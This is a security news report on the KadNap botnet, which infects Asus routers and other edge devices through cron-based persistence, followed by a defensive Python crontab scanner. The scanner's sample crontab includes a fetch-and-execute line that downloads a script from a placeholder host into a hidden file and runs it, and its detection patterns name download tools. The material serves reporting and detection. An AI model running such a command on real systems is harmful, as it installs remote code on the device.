KadNap Malware Infects 14,000+ Edge Devices to Power Stealth Proxy Botnet
https://thehackernews.com/2026/03/kadnap-malware-infects-14000-edge.html
Publish Date: 2026-03-10 12:00:00
Source Domain: thehackernews.com
Cybersecurity researchers have discovered a new malware called KadNap that’s primarily targeting Asus routers to enlist them into a botnet for proxying malicious traffic.
The malware, first detected in the wild in August 2025, has expanded to over 14,000 infected devices, with more than 60% of victims located in the U.S., according to the Black Lotus Labs team at Lumen. A smaller number of infections have been detected in Taiwan, Hong Kong, Russia, the U.K., Australia, Brazil, France, Italy, and Spain.
“KadNap employs a custom version of the Kademlia Distributed Hash Table (DHT) protocol, which is used to conceal the IP address of their infrastructure within a peer-to-peer system to evade traditional network monitoring,” the cybersecurity company said in a report shared with The Hacker News.
Compromised nodes in the network leverage the DHT protocol to locate and connect with a command-and-control (C2) server, thereby making it resilient to detection and disruption efforts.
Once devices are successfully compromised, they are marketed by a proxy service named Doppelgänger (“doppelganger[.]shop”), which is assessed to be a rebrand of Faceless, another proxy service associated with TheMoon malware. Doppelgänger, according to its website, claims to offer resident proxies in over 50 countries that provide “100% anonymity.” The service is said to have launched in May/June 2025.
Despite the focus on Asus routers, the operators of KadNap have been found to deploy the malware against an assorted set of edge networking devices.
Central to the attack is a shell script (“aic.sh”) that’s downloaded from the C2 server (“212.104.141[.]140”), which is responsible for initiating the process of conscripting the victim into the P2P network. The file creates a cron job to retrieve the shell script from the server at the 55-minute mark of every hour, rename it to “.asusrouter,” and run it.
Once persistence is established, the script pulls a malicious ELF file, renames it to…
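The cron-based persistence described above (a fixed minute of every hour, a remote fetch, a hidden dot-file such as “.asusrouter”) is something a defender can hunt for on an edge device. The following is an added example, not code from the report or from Black Lotus Labs: a small crontab scanner whose heuristics are assumptions generalised from the described behaviour, run over a constructed sample crontab (the IP address in it is a placeholder, not the report's indicator).

```python
"""Flag crontab entries that resemble the KadNap-style persistence described
in the report. The heuristics below are assumptions, not the report's logic:
an entry runs at one fixed minute of every hour, fetches from a remote host,
and writes or references a hidden dot-file such as ".asusrouter"."""
import re

FETCH_RE = re.compile(r"\b(wget|curl|tftp|ftpget)\b")          # remote download tools
HIDDEN_FILE_RE = re.compile(r"(^|[\s/])\.[A-Za-z0-9_-]+")       # /path/.dotfile or bare .dotfile
CHMOD_X_RE = re.compile(r"\bchmod\b[^;&|]*\+x")                 # fetched content made executable
# Five schedule fields, then the rest of the line; for /etc/crontab-style
# entries the user name simply becomes the first token of "command".
CRON_RE = re.compile(r"^\s*(\S+)\s+(\S+)\s+(\S+)\s+(\S+)\s+(\S+)\s+(.*)$")


def assess_cron_line(line: str) -> list[str]:
    """Return the reasons a crontab line looks like KadNap persistence.

    An empty list means the line is not flagged. Reporting stays quiet unless a
    remote fetch is combined with a hidden dot-file, so ordinary curl/wget jobs
    (health checks, updaters) are not reported on their own."""
    if not line.strip() or line.lstrip().startswith("#"):
        return []
    m = CRON_RE.match(line)
    if not m:
        return []
    minute, hour, command = m.group(1), m.group(2), m.group(6)
    reasons = []
    if minute.isdigit() and hour == "*":
        reasons.append(f"fixed minute {minute} of every hour")
    if FETCH_RE.search(command):
        reasons.append("remote fetch in command")
    if HIDDEN_FILE_RE.search(command):
        reasons.append("hidden dot-file referenced")
    if CHMOD_X_RE.search(command):
        reasons.append("chmod +x on fetched file")
    suspicious = "remote fetch in command" in reasons and "hidden dot-file referenced" in reasons
    return reasons if suspicious else []


# Constructed sample crontab; 192.0.2.10 is a documentation-range placeholder.
SAMPLE_CRONTAB = """\
# constructed sample, not a real capture
0 3 * * * /usr/sbin/logrotate /etc/logrotate.conf
*/5 * * * * /usr/bin/ntpdate -u pool.ntp.org
55 * * * * wget -q http://192.0.2.10/aic.sh -O /tmp/.asusrouter; chmod +x /tmp/.asusrouter; /tmp/.asusrouter
30 * * * * curl -s https://example.com/health >/dev/null
"""


def scan_crontab(text: str) -> dict[str, list[str]]:
    """Map each flagged crontab line to the reasons it was flagged."""
    return {ln: r for ln in text.splitlines() if (r := assess_cron_line(ln))}
```

On a real device the same function can be fed the output of `crontab -l` or the contents of `/etc/crontab` and the `cron.d` directory.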